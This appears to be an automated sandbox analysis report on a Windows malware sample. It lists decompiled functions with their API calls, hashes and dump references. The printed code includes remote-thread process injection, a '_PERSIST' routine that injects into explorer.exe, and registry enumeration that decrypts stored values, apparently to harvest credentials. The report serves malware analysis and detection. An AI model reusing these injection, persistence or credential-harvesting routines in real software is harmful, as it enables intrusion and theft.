                                    • Instruction ID: 1c4186debc08bb4691b9d877f2086b3288a94b326db33eea14d01e2d90e30b07
                                    • Opcode Fuzzy Hash: bfaa1bf5a76bb33d25c94b861d856369e6bc4f61e8fef42f9b41c50ef0775c6e
                                    • Instruction Fuzzy Hash: 52110230324644AED702DB658C12A9F7BECDB0A704F6204BAF400E22D2D67D5E00DA68
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 004038AC, Relevance: 4.6, APIs: 3, Instructions: 51synchronizationthreadinjectionCOMMON
                                    Download Yara Rule
                                    C-Code - Quality: 100%
                                    			E004038AC(void* __eax, void* __ecx, void* __edx, char _a4, long _a8) {
				void* _v8;
				long _v12;
				long _v16;
				void* _t16;
				void* _t23;
				void* _t31;
				void* _t32;
				void* _t33;

				_v8 = __ecx;
				_t31 = __edx;
				_t23 = __eax;
				_t33 = E0040387C(__eax, _a8, _v8);
				_t16 = CreateRemoteThread(_t23, 0, 0, E0040387C(_t23, E004037DC(__edx), _t31), _t33, 0,  &_v16); // executed
				_t32 = _t16;
				if(_a4 != 0) {
					WaitForSingleObject(_t32, 0xffffffff);
					ReadProcessMemory(_t23, _t33, _v8, _a8,  &_v12);
				}
				return _t32;
			}











                                    0x004038b5
                                    0x004038b8
                                    0x004038ba
                                    0x004038c9
                                    0x004038ea
                                    0x004038ef
                                    0x004038f5
                                    0x004038fa
                                    0x0040390d
                                    0x0040390d
                                    0x0040391a

                                    APIs
                                      • Part of subcall function 0040387C: VirtualAllocEx.KERNEL32(?,00000000,?,00003000,00000040,?,?,?,?,?,004038C9), ref: 00403892
                                      • Part of subcall function 0040387C: WriteProcessMemory.KERNEL32(?,00000000,?,?,?,?,00000000,?,00003000,00000040,?,?,?,?,?,004038C9), ref: 0040389E
                                    • CreateRemoteThread.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 004038EA
                                    • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 004038FA
                                    • ReadProcessMemory.KERNEL32(?,00000000,?,?,00000000,00000000,000000FF), ref: 0040390D
                                    Memory Dump Source
                                    • Source File: 00000005.00000002.544831654.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000005.00000002.544817764.0000000000400000.00000002.00020000.sdmp Download File
                                    • Associated: 00000005.00000002.544862251.0000000000410000.00000040.00020000.sdmp Download File
                                    • Associated: 00000005.00000002.544888619.0000000000414000.00000040.00020000.sdmp Download File
                                    • Associated: 00000005.00000002.544945916.0000000000451000.00000080.00020000.sdmp Download File
                                    • Associated: 00000005.00000002.544973019.0000000000456000.00000004.00020000.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: MemoryProcess$AllocCreateObjectReadRemoteSingleThreadVirtualWaitWrite
                                    • String ID:
                                    • API String ID: 3966641755-0
                                    • Opcode ID: 51aba04c633cb2b561979a642a955c1eb1e5a5082f4e13737333612bceef90ab
                                    • Instruction ID: 98dfc2b63562e43be382328cbb186e20acb4a9321053857b4be2ba9adcb19dad
                                    • Opcode Fuzzy Hash: 51aba04c633cb2b561979a642a955c1eb1e5a5082f4e13737333612bceef90ab
                                    • Instruction Fuzzy Hash: D9018F717001087BD710EA6E8C81FAFBBED8B89325F20857AB518E73C1D974DE0083A8
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 0040555C, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 58COMMON
                                    Download Yara Rule
                                    C-Code - Quality: 37%
                                    			E0040555C(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				long _v8;
				char _v12;
				char _v16;
				char _v20;
				void* _t28;
				intOrPtr _t41;
				intOrPtr _t45;
				intOrPtr _t50;
				intOrPtr _t51;
				void* _t52;

				_t52 = __eflags;
				_t48 = __esi;
				_t47 = __edi;
				_t50 = _t51;
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_push(_t50);
				_push(0x405607);
				_push( *[fs:eax]);
				 *[fs:eax] = _t51;
				_push(_t50);
				_push( *[fs:eax]);
				 *[fs:eax] = _t51;
				_v8 = 0x100;
				E00402074( &_v12, _v8);
				GetUserNameA(E00401F48(_v12),  &_v8); // executed
				_pop(_t41);
				 *[fs:eax] = _t41;
				E00404740(_v12, __ebx,  &_v16, __edi, __esi, _t52);
				_push(_v16);
				E00404740("CurrentUser", __ebx,  &_v20, _t47, _t48, _t52);
				_pop(_t28);
				E00401E94(_t28, _v20);
				_t45 = 0x4055b2;
				 *[fs:eax] = _t45;
				_push(E0040560E);
				return E00401AE4( &_v20, 3);
			}













                                    0x0040555c
                                    0x0040555c
                                    0x0040555c
                                    0x0040555d
                                    0x00405561
                                    0x00405562
                                    0x00405563
                                    0x00405564
                                    0x00405565
                                    0x00405566
                                    0x00405567
                                    0x0040556a
                                    0x0040556b
                                    0x00405570
                                    0x00405573
                                    0x00405578
                                    0x0040557e
                                    0x00405581
                                    0x00405584
                                    0x00405591
                                    0x004055a3
                                    0x004055aa
                                    0x004055ad
                                    0x004055ca
                                    0x004055d2
                                    0x004055db
                                    0x004055e3
                                    0x004055e4
                                    0x004055ee
                                    0x004055f1
                                    0x004055f4
                                    0x00405606

                                    APIs
                                    • GetUserNameA.ADVAPI32(00000000,00000100), ref: 004055A3
                                      • Part of subcall function 00404740: CharUpperA.USER32(?,00000000,004047B5), ref: 0040477E
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000005.00000002.544831654.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000005.00000002.544817764.0000000000400000.00000002.00020000.sdmp Download File
                                    • Associated: 00000005.00000002.544862251.0000000000410000.00000040.00020000.sdmp Download File
                                    • Associated: 00000005.00000002.544888619.0000000000414000.00000040.00020000.sdmp Download File
                                    • Associated: 00000005.00000002.544945916.0000000000451000.00000080.00020000.sdmp Download File
                                    • Associated: 00000005.00000002.544973019.0000000000456000.00000004.00020000.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: CharNameUpperUser
                                    • String ID: CurrentUser
                                    • API String ID: 2323927870-4020899948
                                    • Opcode ID: 853bb1a9f8488690d3976ac596565df22d622e323bac42d31dd580fe65a838f1
                                    • Instruction ID: 79fc34cd5b686bd2ad1a611b0b6b124d48364b0ba66751db6594d0a242cb1dd3
                                    • Opcode Fuzzy Hash: 853bb1a9f8488690d3976ac596565df22d622e323bac42d31dd580fe65a838f1
                                    • Instruction Fuzzy Hash: 65117375514604BEDB05DB91DC56CAF77BCE749700B91487AF400E3680D7786E048964
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 00406660, Relevance: 1.5, APIs: 1, Instructions: 16COMMON
                                    Download Yara Rule
                                    C-Code - Quality: 100%
                                    			E00406660(void* __eax) {
				signed char _t5;

				_t5 = GetFileAttributesA(E00401F48(__eax)); // executed
				if(_t5 == 0xffffffff || (_t5 & 0x00000010) == 0) {
					return 0;
				} else {
					return 1;
				}
			}




                                    0x0040666b
                                    0x00406673
                                    0x0040667c
                                    0x0040667d
                                    0x00406680
                                    0x00406680

                                    APIs
                                    • GetFileAttributesA.KERNEL32(00000000,00000000,004066BB,00000000,00406794,?,?,00000000,00000000,00000000,00000000), ref: 0040666B
                                    Memory Dump Source
                                    • Source File: 00000005.00000002.544831654.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000005.00000002.544817764.0000000000400000.00000002.00020000.sdmp Download File
                                    • Associated: 00000005.00000002.544862251.0000000000410000.00000040.00020000.sdmp Download File
                                    • Associated: 00000005.00000002.544888619.0000000000414000.00000040.00020000.sdmp Download File
                                    • Associated: 00000005.00000002.544945916.0000000000451000.00000080.00020000.sdmp Download File
                                    • Associated: 00000005.00000002.544973019.0000000000456000.00000004.00020000.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: AttributesFile
                                    • String ID:
                                    • API String ID: 3188754299-0
                                    • Opcode ID: 8d8daad035d5671b8178c2915dad3478ed26a251ea86b8f1ac7929fd72162bf1
                                    • Instruction ID: fca0ec8dcb75db4ffbb1fbdbb764ae01d2ede40a2229cdd6f6647931c02f8f91
                                    • Opcode Fuzzy Hash: 8d8daad035d5671b8178c2915dad3478ed26a251ea86b8f1ac7929fd72162bf1
                                    • Instruction Fuzzy Hash: B8C08CE02012000ADE10A9FE0CC1A1A02C80E1437AB602F7BF039F33E2E27F88322028
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 00403566, Relevance: 1.5, APIs: 1, Instructions: 15synchronizationCOMMON
                                    Download Yara Rule
                                    C-Code - Quality: 68%
                                    			E00403566(struct _SECURITY_ATTRIBUTES* _a4, void* _a8, CHAR* _a12) {
				void* _t8;

				_t4 = _a12;
				asm("sbb eax, eax");
				_t8 = CreateMutexA(_a4,  &(_a12[1]) & 0x0000007f, _t4); // executed
				return _t8;
			}




                                    0x0040356b
                                    0x00403573
                                    0x0040357e
                                    0x00403584

                                    APIs
                                    • CreateMutexA.KERNEL32(?,?,?,?,?), ref: 0040357E
                                    Memory Dump Source
                                    • Source File: 00000005.00000002.544831654.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000005.00000002.544817764.0000000000400000.00000002.00020000.sdmp Download File
                                    • Associated: 00000005.00000002.544862251.0000000000410000.00000040.00020000.sdmp Download File
                                    • Associated: 00000005.00000002.544888619.0000000000414000.00000040.00020000.sdmp Download File
                                    • Associated: 00000005.00000002.544945916.0000000000451000.00000080.00020000.sdmp Download File
                                    • Associated: 00000005.00000002.544973019.0000000000456000.00000004.00020000.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: CreateMutex
                                    • String ID:
                                    • API String ID: 1964310414-0
                                    • Opcode ID: 4e517a16085b8900b141571b75f19e29287a41f7ed24e47c7e5cc36522aeb123
                                    • Instruction ID: 72f15282d468185fbe7a0b5f937441395a77a4796b686d6b9836a445fb31a29c
                                    • Opcode Fuzzy Hash: 4e517a16085b8900b141571b75f19e29287a41f7ed24e47c7e5cc36522aeb123
                                    • Instruction Fuzzy Hash: 6ED0127325024CBFC700EEBDCC05DAB33DC9718609B008425B918C7100D139EA508B64
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 00403568, Relevance: 1.5, APIs: 1, Instructions: 14synchronizationCOMMON
                                    Download Yara Rule
                                    C-Code - Quality: 68%
                                    			E00403568(struct _SECURITY_ATTRIBUTES* _a4, void* _a8, CHAR* _a12) {
				void* _t8;

				_t4 = _a12;
				asm("sbb eax, eax");
				_t8 = CreateMutexA(_a4,  &(_a12[1]) & 0x0000007f, _t4); // executed
				return _t8;
			}




                                    0x0040356b
                                    0x00403573
                                    0x0040357e
                                    0x00403584

                                    APIs
                                    • CreateMutexA.KERNEL32(?,?,?,?,?), ref: 0040357E
                                    Memory Dump Source
                                    • Source File: 00000005.00000002.544831654.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000005.00000002.544817764.0000000000400000.00000002.00020000.sdmp Download File
                                    • Associated: 00000005.00000002.544862251.0000000000410000.00000040.00020000.sdmp Download File
                                    • Associated: 00000005.00000002.544888619.0000000000414000.00000040.00020000.sdmp Download File
                                    • Associated: 00000005.00000002.544945916.0000000000451000.00000080.00020000.sdmp Download File
                                    • Associated: 00000005.00000002.544973019.0000000000456000.00000004.00020000.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: CreateMutex
                                    • String ID:
                                    • API String ID: 1964310414-0
                                    • Opcode ID: 21e0619b74412fae9514185c35c6bd95fbb7b52f213a822672066e7264c0ded7
                                    • Instruction ID: b1e9c139d53b74868f197cdea1108a814add3867d20bcc7908f8201953e61f5a
                                    • Opcode Fuzzy Hash: 21e0619b74412fae9514185c35c6bd95fbb7b52f213a822672066e7264c0ded7
                                    • Instruction Fuzzy Hash: 0FC0127315024CABC700EEBDCC05D9B33DC5718609B008425B518C7100D139E6508B64
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 0040115D, Relevance: 1.5, APIs: 1, Instructions: 8memoryCOMMON
                                    Download Yara Rule
                                    APIs
                                    • RtlReAllocateHeap.NTDLL(00560000,00000000), ref: 0040116D
                                    Memory Dump Source
                                    • Source File: 00000005.00000002.544831654.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000005.00000002.544817764.0000000000400000.00000002.00020000.sdmp Download File
                                    • Associated: 00000005.00000002.544862251.0000000000410000.00000040.00020000.sdmp Download File
                                    • Associated: 00000005.00000002.544888619.0000000000414000.00000040.00020000.sdmp Download File
                                    • Associated: 00000005.00000002.544945916.0000000000451000.00000080.00020000.sdmp Download File
                                    • Associated: 00000005.00000002.544973019.0000000000456000.00000004.00020000.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: AllocateHeap
                                    • String ID:
                                    • API String ID: 1279760036-0
                                    • Opcode ID: 92043600f179df8161fd90e7cc6715d268c81291364fb812c52fc1a0b5335f47
                                    • Instruction ID: de04998b76c7b9bc537c8d7dd9716f6d6fbeb3d3f43a7f0598963b3529812e59
                                    • Opcode Fuzzy Hash: 92043600f179df8161fd90e7cc6715d268c81291364fb812c52fc1a0b5335f47
                                    • Instruction Fuzzy Hash: 08B092B2500100AAD740D799DD42F4222ACA30C348F840C647248F31A1D13CA420472C
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 00401122, Relevance: 1.5, APIs: 1, Instructions: 8memoryCOMMON
                                    Download Yara Rule
                                    C-Code - Quality: 100%
                                    			E00401122(long __eax) {
				long _t2;
				void* _t3;
				void* _t4;

				_t2 =  *0x40d03c; // 0x0
				_t3 =  *0x40e590; // 0x560000
				_t4 = RtlAllocateHeap(_t3, _t2, __eax); // executed
				return _t4;
			}






                                    0x00401125
                                    0x0040112b
                                    0x00401131
                                    0x00401136

                                    APIs
                                    • RtlAllocateHeap.NTDLL(00560000,00000000), ref: 00401131
                                    Memory Dump Source
                                    • Source File: 00000005.00000002.544831654.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000005.00000002.544817764.0000000000400000.00000002.00020000.sdmp Download File
                                    • Associated: 00000005.00000002.544862251.0000000000410000.00000040.00020000.sdmp Download File
                                    • Associated: 00000005.00000002.544888619.0000000000414000.00000040.00020000.sdmp Download File
                                    • Associated: 00000005.00000002.544945916.0000000000451000.00000080.00020000.sdmp Download File
                                    • Associated: 00000005.00000002.544973019.0000000000456000.00000004.00020000.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: AllocateHeap
                                    • String ID:
                                    • API String ID: 1279760036-0
                                    • Opcode ID: 38f1c27535b0e948f5a5ad8ec0e8e926c9901c3518291cec7c5888f3411caa45
                                    • Instruction ID: c8d19fe016ae2e0651702f7a29d851e7a2fc058706c9609f530dee1e772ded5c
                                    • Opcode Fuzzy Hash: 38f1c27535b0e948f5a5ad8ec0e8e926c9901c3518291cec7c5888f3411caa45
                                    • Instruction Fuzzy Hash: 65B092A5A00000AFE640E7ED9E40E2223ECA70C2083800C247208E3162E13898104728
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 00401139, Relevance: 1.3, APIs: 1, Instructions: 14memoryCOMMON
                                    Download Yara Rule
                                    C-Code - Quality: 33%
                                    			E00401139(void* __eax) {
				signed int _t2;
				void* _t4;
				signed int _t5;

				_t2 =  *0x40d03c; // 0x0
				_t4 =  *0x40e590; // 0x560000
				_t5 = HeapFree(_t4, _t2 & 0x00000001, ??); // executed
				asm("sbb eax, eax");
				return  ~_t5 & 0x0000007f;
			}






                                    0x0040113c
                                    0x00401145
                                    0x0040114b
                                    0x00401153
                                    0x0040115b

                                    APIs
                                    • HeapFree.KERNEL32(00560000,00000000), ref: 0040114B
                                    Memory Dump Source
                                    • Source File: 00000005.00000002.544831654.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000005.00000002.544817764.0000000000400000.00000002.00020000.sdmp Download File
                                    • Associated: 00000005.00000002.544862251.0000000000410000.00000040.00020000.sdmp Download File
                                    • Associated: 00000005.00000002.544888619.0000000000414000.00000040.00020000.sdmp Download File
                                    • Associated: 00000005.00000002.544945916.0000000000451000.00000080.00020000.sdmp Download File
                                    • Associated: 00000005.00000002.544973019.0000000000456000.00000004.00020000.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: FreeHeap
                                    • String ID:
                                    • API String ID: 3298025750-0
                                    • Opcode ID: 8a124644f8f097871d45822bdc4a07bce697b48a0407d33212c7d5ecf4e4f020
                                    • Instruction ID: 0196c5bfe9261146ad4c3cc9aab034bd4c3b0778a6c2e215fe72248fa00cbfe1
                                    • Opcode Fuzzy Hash: 8a124644f8f097871d45822bdc4a07bce697b48a0407d33212c7d5ecf4e4f020
                                    • Instruction Fuzzy Hash: 47C08CB3220101ABDB0087E9DDC2D6622ECB208208B140C21F908EB061E13EC8A40228
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Non-executed Functions

                                    Function 0040B7FC, Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 85processthreadCOMMON
                                    Download Yara Rule
                                    C-Code - Quality: 65%
                                    			E0040B7FC(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				long _v8;
				struct _PROCESS_INFORMATION _v24;
				struct _STARTUPINFOA _v92;
				char _v96;
				intOrPtr _t21;
				void* _t44;
				intOrPtr* _t50;
				intOrPtr _t53;
				void* _t62;

				_push(__ebx);
				_push(__esi);
				_v96 = 0;
				_push(_t62);
				_push(0x40b8fa);
				_push( *[fs:eax]);
				 *[fs:eax] = _t62 + 0xffffffa4;
				_t50 =  *0x40d204; // 0x40e8f8
				E00401D9C( &_v96, "_PERSIST",  *_t50);
				_t44 = E00403568(0, 0, E00401F48(_v96));
				if(GetLastError() != 0xb7) {
					CloseHandle(_t44);
					_t21 =  *0x40d1cc; // 0x40e924
					_t59 = E00401F9C(_t21);
					GetWindowThreadProcessId(FindWindowA("Shell_TrayWnd", 0),  &_v8);
					if(E004040F4(OpenProcess(0x1f0fff, 0, _v8), _t27, "_PERSIST", _t22, __edi, _t22) == 0) {
						E00403738();
						E00403738();
						CreateProcessA(0, "explorer.exe", 0, 0, 0, 4, 0, 0,  &_v92,  &_v24);
						E004040F4(_v24.hProcess, _v24.hProcess, "_PERSIST", _t59, __edi, _t59);
					}
				} else {
					CloseHandle(_t44);
				}
				_pop(_t53);
				 *[fs:eax] = _t53;
				_push(E0040B901);
				return E00401AC0( &_v96);
			}












                                    0x0040b802
                                    0x0040b803
                                    0x0040b806
                                    0x0040b80b
                                    0x0040b80c
                                    0x0040b811
                                    0x0040b814
                                    0x0040b817
                                    0x0040b827
                                    0x0040b83e
                                    0x0040b84a
                                    0x0040b858
                                    0x0040b85d
                                    0x0040b867
                                    0x0040b87a
                                    0x0040b89c
                                    0x0040b8a6
                                    0x0040b8b3
                                    0x0040b8d3
                                    0x0040b8df
                                    0x0040b8df
                                    0x0040b84c
                                    0x0040b84d
                                    0x0040b84d
                                    0x0040b8e6
                                    0x0040b8e9
                                    0x0040b8ec
                                    0x0040b8f9

                                    APIs
                                      • Part of subcall function 00403568: CreateMutexA.KERNEL32(?,?,?,?,?), ref: 0040357E
                                    • GetLastError.KERNEL32(00000000,0040B8FA), ref: 0040B840
                                    • CloseHandle.KERNEL32(00000000,00000000,0040B8FA), ref: 0040B84D
                                    • CloseHandle.KERNEL32(00000000,00000000,0040B8FA), ref: 0040B858
                                    • FindWindowA.USER32(Shell_TrayWnd,00000000), ref: 0040B874
                                    • GetWindowThreadProcessId.USER32(00000000,Shell_TrayWnd), ref: 0040B87A
                                    • OpenProcess.KERNEL32(001F0FFF,00000000,?,00000000,Shell_TrayWnd,00000000,?,00000000,00000000,0040B8FA), ref: 0040B88A
                                    • CreateProcessA.KERNEL32(00000000,explorer.exe,00000000,00000000,00000000,00000004,00000000,00000000,?,?,001F0FFF,00000000,?,00000000,Shell_TrayWnd,00000000), ref: 0040B8D3
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000005.00000002.544831654.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000005.00000002.544817764.0000000000400000.00000002.00020000.sdmp Download File
                                    • Associated: 00000005.00000002.544862251.0000000000410000.00000040.00020000.sdmp Download File
                                    • Associated: 00000005.00000002.544888619.0000000000414000.00000040.00020000.sdmp Download File
                                    • Associated: 00000005.00000002.544945916.0000000000451000.00000080.00020000.sdmp Download File
                                    • Associated: 00000005.00000002.544973019.0000000000456000.00000004.00020000.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: Process$CloseCreateHandleWindow$ErrorFindLastMutexOpenThread
                                    • String ID: $@$Shell_TrayWnd$_PERSIST$explorer.exe
                                    • API String ID: 3936873891-3256395681
                                    • Opcode ID: 2b401503719d3aa7f099eeab5781e16d72b08eee685420142a78a614276c7692
                                    • Instruction ID: a98b29369305a718b3746a0c20b80fe6e43b54703aa679a88659f244b6e949d5
                                    • Opcode Fuzzy Hash: 2b401503719d3aa7f099eeab5781e16d72b08eee685420142a78a614276c7692
                                    • Instruction Fuzzy Hash: 862131B5B402097BE710FBA5CC42F9E77ACDB44705F60843BB600BB2D2DA78AE05566D
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 00408E58, Relevance: 16.1, APIs: 6, Strings: 3, Instructions: 328registryencryptionCOMMON
                                    Download Yara Rule
                                    C-Code - Quality: 69%
                                    			E00408E58(char __eax, void* __ebx, void* __ecx, char* __edx, void* __edi, char* __esi, void* __fp0) {
				char _v8;
				intOrPtr _v12;
				int _v16;
				char _v20;
				void* _v24;
				int _v28;
				int _v32;
				int _v36;
				char* _v40;
				char* _v44;
				char _v48;
				intOrPtr _v52;
				char _v56;
				intOrPtr _v60;
				char _v64;
				char _v68;
				char _v72;
				char _v76;
				char _v80;
				char _v84;
				char _v88;
				char _v92;
				char _v96;
				char _v100;
				char _v104;
				char _v108;
				char _v112;
				long _t168;
				long _t238;
				long _t251;
				char* _t259;
				signed int _t260;
				intOrPtr _t262;
				intOrPtr _t323;
				intOrPtr _t326;
				intOrPtr _t327;
				long _t339;
				long _t340;
				intOrPtr _t343;
				intOrPtr _t344;
				void* _t350;

				_t350 = __fp0;
				_t341 = __esi;
				_t343 = _t344;
				_t262 = 0xd;
				do {
					_push(0);
					_push(0);
					_t262 = _t262 - 1;
				} while (_t262 != 0);
				_t1 =  &_v8;
				 *_t1 = _t262;
				_push(__esi);
				_v12 =  *_t1;
				_t259 = __edx;
				_v8 = __eax;
				E0040302C(_v8);
				_push(_t343);
				_push(0x4092a7);
				_push( *[fs:eax]);
				 *[fs:eax] = _t344;
				E00401AC0( &_v80);
				_v16 = 0;
				if(RegOpenKeyExA(0x80000001, _t259, 0, 1,  &_v24) == 0) {
					_v28 = 0x400;
					_t341 = E00401174(_v28);
					while(RegEnumValueA(_v24, _v16, _t341,  &_v28, 0, 0, 0, 0) != 0x103) {
						_v28 = 0x400;
						_t339 = E00402E08();
						__eflags = _t339;
						if(_t339 >= 0) {
							_t340 = _t339 + 1;
							_t260 = 0;
							__eflags = 0;
							do {
								E00408AF8( *((intOrPtr*)(_v8 + _t260 * 4)), _t260,  &_v20, _t340, _t341);
								RegQueryValueExA(_v24, _t341, 0,  &_v32, 0,  &_v36);
								_push(_v36);
								E00402FBC();
								_t344 = _t344 + 4;
								_t238 = RegQueryValueExA(_v24, _t341, 0,  &_v32, _v40,  &_v36);
								__eflags = _t238;
								if(_t238 == 0) {
									_v44 = _v40;
									_v48 = _v36;
									_v60 =  *((intOrPtr*)(_v8 + _t260 * 4));
									E00402218( &_v84,  *((intOrPtr*)(_v8 + _t260 * 4)));
									_v64 = E00402274(_v84) + 1 + E00402274(_v84) + 1;
									_push( &_v56);
									_push(1);
									_push(0);
									_push(0);
									_push( &_v64);
									_push(0);
									_t251 =  &_v48;
									_push(_t251);
									L004086F0();
									__eflags = _t251;
									if(_t251 != 0) {
										_push(_v80);
										_push("Address: ");
										E00401CDC( &_v88,  *((intOrPtr*)(_v8 + _t260 * 4)));
										_push(_v88);
										_push(0x4092d4);
										E00401E10();
										_push(_v80);
										E00408CCC(_v52, _t260,  &_v92, _t340, _t341, _t350);
										_push(_v92);
										_push(0x4092e0);
										E00401E10();
									}
								}
								_t260 = _t260 + 1;
								_t340 = _t340 - 1;
								__eflags = _t340;
							} while (_t340 != 0);
						}
						E00403738();
						_t57 =  &_v16;
						 *_t57 = _v16 + 1;
						__eflags =  *_t57;
					}
				}
				RegCloseKey(_v24);
				L17:
				while(E0040202C(0x4092e0, _v80) > 0) {
					E00401FA4(_v80, E0040202C(0x4092e0, _v80) - 1, 1,  &_v72);
					E00401FE4( &_v80, E0040202C(0x4092e0, _v80) + 1, 1);
					E00401D9C( &_v100, 0x4092e0, _v72);
					E0040592C(_v100, _t259, _v80, 0, _t341, __eflags,  &_v96);
					E00401B58( &_v80, _v96);
					__eflags = E0040202C(0x4092ec, _v72) - 1;
					E00401FA4(_v72, E0040202C(0x4092ec, _v72) - 1, 1,  &_v104);
					E00401E94(_v104, "Address");
					if(__eflags == 0) {
						E00401FE4( &_v72, E0040202C(0x409308, _v72), 1);
						E00401FA4(_v72, E0040202C(0x4092d4, _v72) - 1, 1,  &_v68);
						E00401FE4( &_v72, E0040202C(0x4092d4, _v72), 1);
						while(1) {
							_t168 = E0040202C(0x4092d4, _v72);
							__eflags = _t168;
							if(_t168 <= 0) {
								goto L17;
							}
							E00401FE4( &_v72, E0040202C(0x409308, _v72), 1);
							_push(_v76);
							_push(_v68);
							_push(0x4092d4);
							E00401FA4(_v72, E0040202C(0x4092d4, _v72) - 1, 1,  &_v108);
							_push(_v108);
							_push(0x4092d4);
							E00401E10();
							E00401FE4( &_v72, E0040202C(0x4092d4, _v72), 1);
							E00401FE4( &_v72, E0040202C(0x409308, _v72), 1);
							_push(_v76);
							__eflags = E0040202C(0x4092d4, _v72) - 1;
							E00401FA4(_v72, E0040202C(0x4092d4, _v72) - 1, 1,  &_v112);
							_push(_v112);
							_push(0x4092d4);
							E00401E10();
							E00401FE4( &_v72, E0040202C(0x4092d4, _v72), 1);
							E00401D58( &_v76, 0x4092e0);
						}
					}
				}
				E00401B14(_v12, _v76);
				_pop(_t323);
				 *[fs:eax] = _t323;
				_push(E004092AE);
				E00401AE4( &_v112, 7);
				E00402108( &_v84);
				E00401AE4( &_v80, 4);
				_t326 =  *0x408e34; // 0x408e38
				E00402FC8( &_v40, _t326);
				E00401AC0( &_v20);
				_t327 =  *0x408730; // 0x408734
				return E00402FC8( &_v8, _t327);
			}












































                                    0x00408e58
                                    0x00408e58
                                    0x00408e59
                                    0x00408e5c
                                    0x00408e61
                                    0x00408e61
                                    0x00408e63
                                    0x00408e65
                                    0x00408e65
                                    0x00408e68
                                    0x00408e68
                                    0x00408e6c
                                    0x00408e6e
                                    0x00408e71
                                    0x00408e73
                                    0x00408e79
                                    0x00408e80
                                    0x00408e81
                                    0x00408e86
                                    0x00408e89
                                    0x00408e8f
                                    0x00408e96
                                    0x00408eae
                                    0x00408eb4
                                    0x00408ec3
                                    0x00408ff8
                                    0x00408eca
                                    0x00408ed9
                                    0x00408edb
                                    0x00408edd
                                    0x00408ee3
                                    0x00408ee4
                                    0x00408ee4
                                    0x00408ee6
                                    0x00408eef
                                    0x00408f05
                                    0x00408f0d
                                    0x00408f1c
                                    0x00408f21
                                    0x00408f37
                                    0x00408f3c
                                    0x00408f3e
                                    0x00408f47
                                    0x00408f4d
                                    0x00408f56
                                    0x00408f62
                                    0x00408f72
                                    0x00408f78
                                    0x00408f79
                                    0x00408f7b
                                    0x00408f7d
                                    0x00408f82
                                    0x00408f83
                                    0x00408f85
                                    0x00408f88
                                    0x00408f89
                                    0x00408f8e
                                    0x00408f90
                                    0x00408f92
                                    0x00408f95
                                    0x00408fa3
                                    0x00408fa8
                                    0x00408fab
                                    0x00408fb8
                                    0x00408fbd
                                    0x00408fc9
                                    0x00408fce
                                    0x00408fd1
                                    0x00408fde
                                    0x00408fde
                                    0x00408f90
                                    0x00408fe3
                                    0x00408fe4
                                    0x00408fe4
                                    0x00408fe4
                                    0x00408ee6
                                    0x00408ff0
                                    0x00408ff5
                                    0x00408ff5
                                    0x00408ff5
                                    0x00408ff5
                                    0x00408ff8
                                    0x00409021
                                    0x00000000
                                    0x00409233
                                    0x00409047
                                    0x00409064
                                    0x00409078
                                    0x00409085
                                    0x00409090
                                    0x004090a8
                                    0x004090b1
                                    0x004090be
                                    0x004090c3
                                    0x004090e0
                                    0x00409101
                                    0x0040911d
                                    0x0040921e
                                    0x00409226
                                    0x0040922b
                                    0x0040922d
                                    0x00000000
                                    0x00000000
                                    0x0040913e
                                    0x00409143
                                    0x00409146
                                    0x00409149
                                    0x0040916a
                                    0x0040916f
                                    0x00409172
                                    0x0040917f
                                    0x0040919b
                                    0x004091b7
                                    0x004091bc
                                    0x004091d2
                                    0x004091db
                                    0x004091e0
                                    0x004091e3
                                    0x004091f0
                                    0x0040920c
                                    0x00409219
                                    0x00409219
                                    0x0040921e
                                    0x004090c3
                                    0x0040924e
                                    0x00409255
                                    0x00409258
                                    0x0040925b
                                    0x00409268
                                    0x00409270
                                    0x0040927d
                                    0x00409285
                                    0x0040928b
                                    0x00409293
                                    0x0040929b
                                    0x004092a6

                                    APIs
                                    • RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00000001,?,00000000,004092A7,?,?,?,?,00000000,00000000), ref: 00408EA7
                                    • RegQueryValueExA.ADVAPI32(?,00000000,00000000,?,00000000,?,?,?,00000000,00000400,00000000,00000000,00000000,00000000,80000001), ref: 00408F05
